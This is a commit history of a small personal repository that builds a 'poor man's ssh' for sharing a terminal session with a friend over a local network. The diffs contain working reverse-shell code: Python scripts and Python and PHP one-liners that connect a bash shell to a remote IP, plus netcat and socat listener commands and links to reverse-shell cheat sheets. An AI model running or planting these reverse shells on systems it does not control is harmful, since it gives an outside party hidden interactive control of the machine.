castanley · December 15, 2015 22:04 · Dec 17, 2013 · Dec 16, 2013 · Dec 13, 2013 · Dec 13, 2013
diff --git a/share2.py b/share2.py
@@ -1,20 +1,21 @@
 import sys,socket,os,fcntl,termios,array,select
- 
+
 _,ip,port=sys.argv
-
+
+print "Opening connection..."
 remote = socket.socket()
 remote.connect((ip,int(port)))
 
+print "Launching bash..."
 pid, fd = os.forkpty()
 if pid == 0: # CHILD
     os.execlp('/bin/bash', '-i')
 
-# fix window size by copying the size of stdout to the socket
+# fix window size
 buf = array.array('h', [0, 0, 0, 0])
 fcntl.ioctl(sys.stdout.fileno(), termios.TIOCGWINSZ, buf, True)
 fcntl.ioctl(fd, termios.TIOCSWINSZ, buf)
 
-# loop
 print "Starting loop..."
 while 1:
     avail,_,_ = select.select([fd,remote,sys.stdin], [], [])

diff --git a/share2.py b/share2.py
@@ -0,0 +1,30 @@
+import sys,socket,os,fcntl,termios,array,select
+
+_,ip,port=sys.argv
+
+remote = socket.socket()
+remote.connect((ip,int(port)))
+
+pid, fd = os.forkpty()
+if pid == 0: # CHILD
+    os.execlp('/bin/bash', '-i')
+
+# fix window size by copying the size of stdout to the socket
+buf = array.array('h', [0, 0, 0, 0])
+fcntl.ioctl(sys.stdout.fileno(), termios.TIOCGWINSZ, buf, True)
+fcntl.ioctl(fd, termios.TIOCSWINSZ, buf)
+
+# loop
+print "Starting loop..."
+while 1:
+    avail,_,_ = select.select([fd,remote,sys.stdin], [], [])
+    if fd in avail:
+        data = os.read(fd, 1024)
+        os.write(remote.fileno(),data)
+        os.write(sys.stdout.fileno(), data)
+    if remote in avail:
+        data = os.read(remote.fileno(), 1024)
+        os.write(fd, data)
+    if sys.stdin in avail:
+        data = os.read(sys.stdin.fileno(), 1024)
+        os.write(fd, data)
diff --git a/share.py b/share.py
@@ -0,0 +1,26 @@
+import sys,socket,os,fcntl,struct,pty,termios
+
+count = 0
+def fix_window_size(fd):
+    global count
+    if count == 0:
+      count = 1
+    zeroes = struct.pack('HHHH', 0, 0, 0, 0)
+    size_info = fcntl.ioctl(1, termios.TIOCGWINSZ, zeroes)
+    rows, cols = struct.unpack('HHHH', size_info)[0:2]
+    size_info = struct.pack('HHHH', rows, cols, 0, 0)
+    fcntl.ioctl(fd, termios.TIOCSWINSZ, size_info)
+
+_,ip,port=sys.argv
+
+s = socket.socket()
+s.connect((ip,int(port)))
+os.dup2(s.fileno(),0)
+
+def socket_read(fd):
+    fix_window_size(fd)
+    data = os.read(fd, 1024)
+    os.write(s.fileno(),data)
+    return data
+
+pty.spawn(['/bin/bash','-i'], socket_read)
diff --git a/poor-mans-ssh.sh b/poor-mans-ssh.sh
@@ -28,4 +28,12 @@ screen -R
 # now start a python job to share it in the background
 python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn(['/usr/bin/screen', '-x'])" 192.168.2.176 12345 &
 
-# when either party logs out of the screen session (via CTRL-d), the python is killed and the socket is closed
+# when either party logs out of the screen session (via CTRL-d), the python is killed and the socket is closed
+
+##
+## poor man's screencast - adapted from http://mrnugget.github.io/blog/2013/08/11/named-pipes/
+## assumes your friend on 192.168.2.183 runs "nc -l 9999"
+## then you can stream the contents of your terminal (read-only!) to him as follows:
+## bonus trick: if you want to save your friend's otherise discarded keystrokes, redirect to a file instead of /dev/null
+##
+script -t 0 >(nc 192.168.2.183 9999 > /dev/null)  
diff --git a/poor-mans-ssh.sh b/poor-mans-ssh.sh
@@ -17,3 +17,15 @@ nc -l 12345
 socat `tty`,raw,echo=0 tcp-listen:12345
 
 # enjoy
+
+##
+## with gnu screen, to get share a screen session on the network
+##
+
+# first ensure you are in a screen session
+screen -R
+
+# now start a python job to share it in the background
+python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn(['/usr/bin/screen', '-x'])" 192.168.2.176 12345 &
+
+# when either party logs out of the screen session (via CTRL-d), the python is killed and the socket is closed
diff --git a/resources.md b/resources.md
@@ -14,4 +14,5 @@ TODO:
 * auto-kill spawned processes (not clear whether or not this is a problem..., check `ps aux | grep bash` after python quits)
 * find a way to get python to print out the shell session to host terminal too (ask Vasi?)
   * http://docs.python.org/dev/library/pty.html#pty.spawn
-  * http://opensource.apple.com/source/python/python-3/python/Lib/pty.py?txt
+  * http://opensource.apple.com/source/python/python-3/python/Lib/pty.py?txt
+  * http://coshell.googlecode.com/svn/trunk/coshell.py
diff --git a/resources.md b/resources.md
@@ -1,3 +1,4 @@
+* http://www.ping.eti.br/docs/01/13.txt | "Random Shell Tricks by Teh Crew" - mini hacking guide
 * http://pentestmonkey.net/blog/post-exploitation-without-a-tty | Post-Exploitation Without A TTY | pentestmonkey
 * http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | Reverse Shell Cheat Sheet | pentestmonkey
 * http://bernardodamele.blogspot.ca/2011/09/reverse-shells-one-liners.html | Reverse shells one-liners

diff --git a/resources.md b/resources.md
@@ -6,4 +6,11 @@
 * http://www.dest-unreach.org/socat/doc/socat-ttyovertcp.txt | www.dest-unreach.org/socat/doc/socat-ttyovertcp.txt
 * http://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES | stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES
 * http://superuser.com/questions/123790/socat-and-rich-terminals-with-ctrlc-ctrlz-ctrld-propagation | linux - Socat and rich terminals (with Ctrl+C/Ctrl+Z/Ctrl+D propagation) - Super User
-* http://blog.rootshell.ir/2010/08/get-your-interactive-reverse-shell-on-a-webhost/ | Get Your Interactive Reverse Shell on a Webhost | The #Shell
+* http://blog.rootshell.ir/2010/08/get-your-interactive-reverse-shell-on-a-webhost/ | Get Your Interactive Reverse Shell on a Webhost | The #Shell
+
+TODO: 
+* fix 80 character window limit (see http://sqizit.bartletts.id.au/2011/02/14/pseudo-terminals-in-python/)
+* auto-kill spawned processes (not clear whether or not this is a problem..., check `ps aux | grep bash` after python quits)
+* find a way to get python to print out the shell session to host terminal too (ask Vasi?)
+  * http://docs.python.org/dev/library/pty.html#pty.spawn
+  * http://opensource.apple.com/source/python/python-3/python/Lib/pty.py?txt
diff --git a/resources.md b/resources.md
@@ -0,0 +1,9 @@
+* http://pentestmonkey.net/blog/post-exploitation-without-a-tty | Post-Exploitation Without A TTY | pentestmonkey
+* http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | Reverse Shell Cheat Sheet | pentestmonkey
+* http://bernardodamele.blogspot.ca/2011/09/reverse-shells-one-liners.html | Reverse shells one-liners
+* http://serverfault.com/questions/102277/getting-a-tty-in-a-connectback-shell | linux - Getting a TTY in a Connectback Shell - Server Fault
+* http://www.dest-unreach.org/socat/doc/socat.html#EXAMPLE_OPTION_CTTY | socat
+* http://www.dest-unreach.org/socat/doc/socat-ttyovertcp.txt | www.dest-unreach.org/socat/doc/socat-ttyovertcp.txt
+* http://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES | stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES
+* http://superuser.com/questions/123790/socat-and-rich-terminals-with-ctrlc-ctrlz-ctrld-propagation | linux - Socat and rich terminals (with Ctrl+C/Ctrl+Z/Ctrl+D propagation) - Super User
+* http://blog.rootshell.ir/2010/08/get-your-interactive-reverse-shell-on-a-webhost/ | Get Your Interactive Reverse Shell on a Webhost | The #Shell
diff --git a/poor-mans-ssh.sh b/poor-mans-ssh.sh
@@ -3,14 +3,17 @@
 # on the CLIENT, run the following:
 #   nc -l 12345
 
-# then on the SERVER
-CLIENT_IP=192.168.2.183
-CLIENT_PORT=12345
+# on the SERVER, start the "reverse shell"
+python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')" 192.168.2.176 12345
 
-# start the "reverse shell"
-python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('$CLIENT_IP',$CLIENT_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
+# now go to the CLIENT, listen on port 12345 for incoming shell connections
+nc -l 12345
 
-# or in php...
-php -r "fsockopen('$CLIENT_IP',$CLIENT_PORT); exec('/bin/bash -i <&3 >&3 2>&3');"
+# that worked, but note that 'nc' does a terrible job emulating a tty 
+# (arrows keys aren't sent correctly, don't even try launching vim)
+# instead, let's install socat, a smarter netcat, via "sudo apt-get install socat" or "brew install socat"
 
-# now go to the CLIENT
+# launch socat, asking it to to talk forward all traffic on 12345 to /dev/ttys003 (raw,echo=0 fix tty issues)
+socat `tty`,raw,echo=0 tcp-listen:12345
+
+# enjoy
diff --git a/poor-mans-ssh.sh b/poor-mans-ssh.sh
@@ -0,0 +1,16 @@
+# http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+
+# on the CLIENT, run the following:
+#   nc -l 12345
+
+# then on the SERVER
+CLIENT_IP=192.168.2.183
+CLIENT_PORT=12345
+
+# start the "reverse shell"
+python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('$CLIENT_IP',$CLIENT_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
+
+# or in php...
+php -r "fsockopen('$CLIENT_IP',$CLIENT_PORT); exec('/bin/bash -i <&3 >&3 2>&3');"
+
+# now go to the CLIENT
No results found